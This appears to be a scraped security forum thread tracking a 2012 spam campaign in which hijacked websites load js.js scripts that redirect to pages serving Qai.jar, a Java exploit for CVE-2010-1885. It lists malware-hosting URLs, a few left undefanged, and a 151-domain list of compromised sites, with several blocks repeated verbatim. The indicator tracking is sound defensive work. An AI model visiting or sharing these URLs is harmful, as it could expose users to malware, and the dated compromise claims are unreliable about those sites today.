hXXp://whitecellular.org/content/Qai.jar
hXXp://thebestguide1.com/arKwG4pE/js.js
hXXp://www.extrhema.com.br/cVspcegd/js.js
hXXp://mrsmakeit.com/9jrgDjED/js.js
redirect to a malicious webpage at
hXXp://whitecellular.org/showthread.php?t=d7ad916d1c0396ff
which leads to the suspicious file
hXXp://whitecellular.org/content/Qai.jar
RE: Qai.jar malware (CVE-2010-1885)
From just the last 2 days, here is a list of 151 hijacked hosts found in spam. Each has an 8 random character string in the URL. They are sequenced by most frequent (127 hits) to least frequent (1 hit)
futurisima.com.ar
iips.edu.in
industriadaformatura.com.br
grimper.awardspace.com
gri.or.id
escoladailha.com.br
gardenmoveis.com.br
odontofamily.com.br
gerindra.or.id
giftformom.trei.ro
ttest.co.za
oscardelaolla.com.co
tubogas.com.br
peridot.com.vn
ogrodzeniamirko.home.pl
whiteoak.co.za
tatuielegante.com.br
sillinho.bplaced.net
andif.com.br
damhofer.com
planetafitnessltda.com.br
manczyl.webd.pl
spyder.snowpeak.com.tw
positivacomunicacao.com.br
newsletter.lavorosalute.it
test1991.mebyre.com
nafti.edu.gh
testeaza.trei.ro
lirahost.com.br
twilightbefore.bplaced.net
maxtone.nazwa.pl
dentalimplants123.com
seniordatinggroup.co.uk
corporateuniversity.com.br
mirrorfelder.cnh.at
sbemrj.org.br
cpm.borec.cz
istorie.usm.md
revistatempo.com.br
radicalatm.com.ar
intecone.com.br
elisaviscontinetwork.com
aluguechacaras.com.br
ayvitour.com.ua
chusto.lviv.ua
scsuprema.com.br
eventakustik.de
eurowire.it
aashirwad.com.hk
fitratder.org
mail2.direct.ee
balihai1.tempsite.ws
wp10647654.wp274.webpack.hosteurope.de
visualdesenvolvimento.com.br
ufmi.com.my
rlinux.moderna.com.br
rajniti.co.in
videos.newmotion.at
thebeautiq.com.au
suitesdojo.com.br
sospiscinaspr.com.br
romero12.mserwis.pl
revistalabarra.com.co
laseresp.com.mx
s373104026.online.de
municipioderawson.gob.ar
rmraguapura.com.br
afrohealing.co.za
smileshop.com.au
praxedysadesivos.com.br
hassansaeed.99k.org
ocgcoaching.co.il
rygy.com.br
micmusz.webd.pl
lulu.com.co
izaz.com.br
hoegie.be
marcusxl.blink.pl
z8mm.com.br
gfpesquisas.com.br
kadinmuhendisler.org
redleafapartments.co.in
saofranciscodocorumbau.com.br
oguzhanguzel.av.tr
nackageinvestmentgroup.com.au
newsite.itsgroup.it
barcuta.ro
artdelivery.it
witer.home.pl
v1.globaltransit.net
promocaolilicaetigor.com.br
portal365.freehosting.com
wproduct.99k.org
ssttice.bplaced.net
autoreinigung.at
tiborita.altervista.org
support.imatone.fr
scarletcourier.50webs.com
pm.weexcel.in
personnalis.com.br
prakash.clanteam.com
lawsystem.com.br
zegluga.lh.pl
cityofsutton.org
travian1000x.zzl.org
quickphoto.com.br
ftp.zimmerrestaurante.com.br
ftp.vilasek.com
ismailgunes.web.tr
gastrocomplexeu.pl
bizsizanayasaolmaz.org
wordpressitalia.altervista.org
vivaleboutique.com.br
ucscad.com.br
snowpeak.com.tw
monochromatic.art.pl
imobiliariacruzeirors.com.br
wahbischool.com
kemerburgazfutbolokulu.com
gruppoenter.eu
dimac.com.ar
cbac.com
voip.valorizaweb.com.br
vinicolaperini.com.br
travian250x.zzl.org
travelodubai.co.uk
topkids.com.br
tony.web.id
styling.krakow.pl
ssios.com.pk
snakeprotex.com.au
siwy010.webd.pl
shop.madamegrillet.it
seicommat.hospedagemdesites.ws
s391025613.onlinehome.fr
recantopaulista.com.br
radioresgateonline.com.br
pzas.nazwa.pl
proweb1.bplaced.net
piratrilhas.com.br
patentmall.com.my
pasandola.nixiweb.com
osteologia.org.ar
nortonmini.com.ar
metropolis.com.br
mcms.xs2theworld.com
mariotta.com.br
loja.weissblumenn.com.br
ftp.dariocandela.altervista.org
eminenceorganics.com.my
curicica.com.br
List of domains/hosts
futurisima.com.ar
iips.edu.in
industriadaformatura.com.br
grimper.awardspace.com
gri.or.id
escoladailha.com.br
gardenmoveis.com.br
odontofamily.com.br
gerindra.or.id
giftformom.trei.ro
ttest.co.za
oscardelaolla.com.co
tubogas.com.br
peridot.com.vn
ogrodzeniamirko.home.pl
whiteoak.co.za
tatuielegante.com.br
sillinho.bplaced.net
andif.com.br
damhofer.com
planetafitnessltda.com.br
manczyl.webd.pl
spyder.snowpeak.com.tw
positivacomunicacao.com.br
newsletter.lavorosalute.it
test1991.mebyre.com
nafti.edu.gh
testeaza.trei.ro
lirahost.com.br
twilightbefore.bplaced.net
maxtone.nazwa.pl
dentalimplants123.com
seniordatinggroup.co.uk
corporateuniversity.com.br
mirrorfelder.cnh.at
sbemrj.org.br
cpm.borec.cz
istorie.usm.md
revistatempo.com.br
radicalatm.com.ar
intecone.com.br
elisaviscontinetwork.com
aluguechacaras.com.br
ayvitour.com.ua
chusto.lviv.ua
scsuprema.com.br
eventakustik.de
eurowire.it
aashirwad.com.hk
fitratder.org
mail2.direct.ee
balihai1.tempsite.ws
wp10647654.wp274.webpack.hosteurope.de
visualdesenvolvimento.com.br
ufmi.com.my
rlinux.moderna.com.br
rajniti.co.in
videos.newmotion.at
thebeautiq.com.au
suitesdojo.com.br
sospiscinaspr.com.br
romero12.mserwis.pl
revistalabarra.com.co
laseresp.com.mx
s373104026.online.de
municipioderawson.gob.ar
rmraguapura.com.br
afrohealing.co.za
smileshop.com.au
praxedysadesivos.com.br
hassansaeed.99k.org
ocgcoaching.co.il
rygy.com.br
micmusz.webd.pl
lulu.com.co
izaz.com.br
hoegie.be
marcusxl.blink.pl
z8mm.com.br
gfpesquisas.com.br
kadinmuhendisler.org
redleafapartments.co.in
saofranciscodocorumbau.com.br
oguzhanguzel.av.tr
nackageinvestmentgroup.com.au
newsite.itsgroup.it
barcuta.ro
artdelivery.it
witer.home.pl
v1.globaltransit.net
promocaolilicaetigor.com.br
portal365.freehosting.com
wproduct.99k.org
ssttice.bplaced.net
autoreinigung.at
tiborita.altervista.org
support.imatone.fr
scarletcourier.50webs.com
pm.weexcel.in
personnalis.com.br
prakash.clanteam.com
lawsystem.com.br
zegluga.lh.pl
cityofsutton.org
travian1000x.zzl.org
quickphoto.com.br
ftp.zimmerrestaurante.com.br
ftp.vilasek.com
ismailgunes.web.tr
gastrocomplexeu.pl
bizsizanayasaolmaz.org
wordpressitalia.altervista.org
vivaleboutique.com.br
ucscad.com.br
snowpeak.com.tw
monochromatic.art.pl
imobiliariacruzeirors.com.br
wahbischool.com
kemerburgazfutbolokulu.com
gruppoenter.eu
dimac.com.ar
cbac.com
voip.valorizaweb.com.br
vinicolaperini.com.br
travian250x.zzl.org
travelodubai.co.uk
topkids.com.br
tony.web.id
styling.krakow.pl
ssios.com.pk
snakeprotex.com.au
siwy010.webd.pl
shop.madamegrillet.it
seicommat.hospedagemdesites.ws
s391025613.onlinehome.fr
recantopaulista.com.br
radioresgateonline.com.br
pzas.nazwa.pl
proweb1.bplaced.net
piratrilhas.com.br
patentmall.com.my
pasandola.nixiweb.com
osteologia.org.ar
nortonmini.com.ar
metropolis.com.br
mcms.xs2theworld.com
mariotta.com.br
loja.weissblumenn.com.br
ftp.dariocandela.altervista.org
eminenceorganics.com.my
curicica.com.br
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
hXXp://www.aiopgiovani.it/FoSxV9z1/index.html
loads scripts from all of the following sources
hXXp://www.bestcar.ee/0AfKWVDW/js.js
hXXp://turkwebalan.com/oUvuQ0b7/js.js
hXXp://www.unimoveis.net/jW57W6aZ/js.js
hXXp://uttonheadcollective.com/XvLBzokA/js.js
which redirect to a malicious webpage at
http://azurecellular.com/showthread.php?t=d7ad916d1c0396ff
which leads to the suspicious file
hXXp://azurecellular.com/content/Qai.jar
Many of the scam sites hosting Qai.jar may be divided into two groups, based upon their creation dated.
Creation Date: 13-mar-2012
slickcurve.com (clientHold)
slickicus.com (clientHold)
slickidian.com (clientHold)
slicksphere.com (clientHold)
slickvard.com (IP 74.91.120.189)
Creation Date: 22-mar-2012
azurecellular.com (IP 209.59.217.78)
bluecellular.com (clientHold)
browncellular.com (IP 174.140.168.207)
cyancellular.com (clientHold)
purplecellular.org (CLIENT HOLD)
whitecellular.org (CLIENT HOLD)
loads scripts from all of the following sources
hXXp://www.bestcar.ee/0AfKWVDW/js.js
hXXp://turkwebalan.com/oUvuQ0b7/js.js
hXXp://www.unimoveis.net/jW57W6aZ/js.js
hXXp://uttonheadcollective.com/XvLBzokA/js.js
which redirect to a malicious webpage at
http://azurecellular.com/showthread.php?t=d7ad916d1c0396ff
which leads to the suspicious file
hXXp://azurecellular.com/content/Qai.jar
Many of the scam sites hosting Qai.jar may be divided into two groups, based upon their creation dated.
Creation Date: 13-mar-2012
slickcurve.com (clientHold)
slickicus.com (clientHold)
slickidian.com (clientHold)
slicksphere.com (clientHold)
slickvard.com (IP 74.91.120.189)
Creation Date: 22-mar-2012
azurecellular.com (IP 209.59.217.78)
bluecellular.com (clientHold)
browncellular.com (IP 174.140.168.207)
cyancellular.com (clientHold)
purplecellular.org (CLIENT HOLD)
whitecellular.org (CLIENT HOLD)
Who is online
Users browsing this forum: Bing [Bot] and 2 guests